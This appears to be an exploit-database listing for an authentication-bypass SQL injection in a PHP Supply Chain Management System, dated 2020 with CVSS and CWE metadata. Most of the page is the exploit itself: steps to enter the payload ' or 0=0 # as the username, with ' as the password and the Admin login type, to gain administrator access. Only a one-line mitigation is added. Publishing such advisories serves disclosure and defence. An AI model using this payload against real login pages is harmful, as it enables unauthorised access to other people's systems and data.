header-logo
Suggest Exploit
vendor:
Supply Chain Management System
by:
Piyush Malviya
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Supply Chain Management System
Affected Version From: None
Affected Version To: None
Patch Exists: NO
Related CWE: None
CPE: None
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 Pro Build 18363.1256 + XAMPP V3.2.4
2020

Supply Chain Management System – Auth Bypass SQL Injection

The SQL payload gets executed and authentication is bypassed successfully.

Mitigation:

Input validation and sanitization should be done to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: Supply Chain Management System - Auth Bypass SQL Injection
# Date: 2020-12-11
# Exploit Author: Piyush Malviya
# Vendor Homepage: https://www.sourcecodester.com/php/14619/supply-chain-management-system-phpmysqli-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14619&title=Supply+Chain+Management+System+in+PHP%2FMySQLi+with+Full+Source+Code
# Tested On: Windows 10 Pro Build 18363.1256 + XAMPP V3.2.4

#Vulnerable Page: Login Page

#Exploit
Open the Application
check the URL: http://localhost/scm-master/


Open Login Page
Enter username: ' or 0=0 #
Enter password: '
Select Login Type: Admin

click on login
The SQL payload gets executed and authentication is bypassed successfully